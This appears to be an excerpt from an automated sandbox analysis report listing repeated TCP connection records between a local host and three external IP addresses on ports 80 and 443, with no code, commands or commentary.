              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
